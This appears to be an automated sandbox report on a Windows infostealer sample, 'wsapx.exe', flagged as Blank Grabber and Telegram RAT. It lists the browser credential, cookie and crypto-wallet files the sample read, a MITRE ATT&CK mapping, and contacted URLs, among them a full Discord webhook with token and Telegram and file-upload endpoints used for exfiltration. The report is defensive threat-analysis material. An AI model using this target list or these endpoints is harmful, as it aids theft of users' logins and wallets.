Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\921a1560-5524-44c0-8495-fce7014dcfba	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.2648275073.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2653293501.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152150044.0000015A08634000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2643435154.000001C87B04B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152150044.0000015A08632000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wsapx.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: wsapx.exe PID: 7432, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	2 Native API	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	1 System Shutdown/Reboot
Email Addresses	DNS Server	Domain Accounts	122 Command and Scripting Interpreter	Logon Script (Windows)	11 Process Injection	11 Deobfuscate/Decode Files or Information	Security Account Manager	59 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	2 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	NTDS	261 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	11 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
wsapx.exe	39%	ReversingLabs	Win64.Trojan.Znyonm

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\sqlite3.dll	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pyd	4%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
discord.com	162.159.136.232	true	false	high
ip-api.com	208.95.112.1	true	false	high
blank-5eoty.in	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPsm1-wFNZP3qTm1buU6tOMG	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Blank-c/BlankOBF	wsapx.exe, 00000002.00000003.2175226074.000001C87A147000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2175509272.000001C879D31000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.avito.ru/	wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.ctrip.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.leboncoin.fr/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2158361673.000001C879A7C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://weibo.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.anonfiles.com/upload	wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs	wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.msn.com	wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	wsapx.exe, 00000002.00000002.2655646494.000001C87A310000.00000004.00001000.00020000.00000000.sdmp	false		high
http://cacerts.digi	wsapx.exe, 00000000.00000003.2150867444.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
https://peps.python.org/pep-0205/	wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.reddit.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000B.00000002.2263605331.000002A22AC41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD3521000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ebay.co.uk/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ebay.de/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2651928878.000001C87954C000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000041.00000002.2442904993.000001FAD43FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	wsapx.exe, 00000002.00000003.2181268132.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2182287470.000001C879EBE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180252331.000001C879D49000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2180078817.000001C879EBD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000017.00000002.3404575723.00000266ED200000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	wsapx.exe, 00000002.00000002.2652231018.000001C879720000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://allegro.pl/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000041.00000002.2442904993.000001FAD4E0B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	wsapx.exe, 00000002.00000003.2155967601.000001C879827000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155877096.000001C879826000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C879820000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2155859457.000001C879832000.00000004.00000020.00020000.00000000.sdmp	false		high
https://MD8.mozilla.org/1/m	wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/	wsapx.exe, 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmp	false		high
http://ip-api.com/line/?fields=hostingrzr	wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.bbc.co.uk/	wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod1C:	edb.log.23.dr	false		high
https://bugzilla.mo	wsapx.exe, 00000002.00000002.2655982929.000001C87A528000.00000004.00001000.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2263605331.000002A22AE69000.00000004.00000800.00020000.00000000.sdmp	false		high
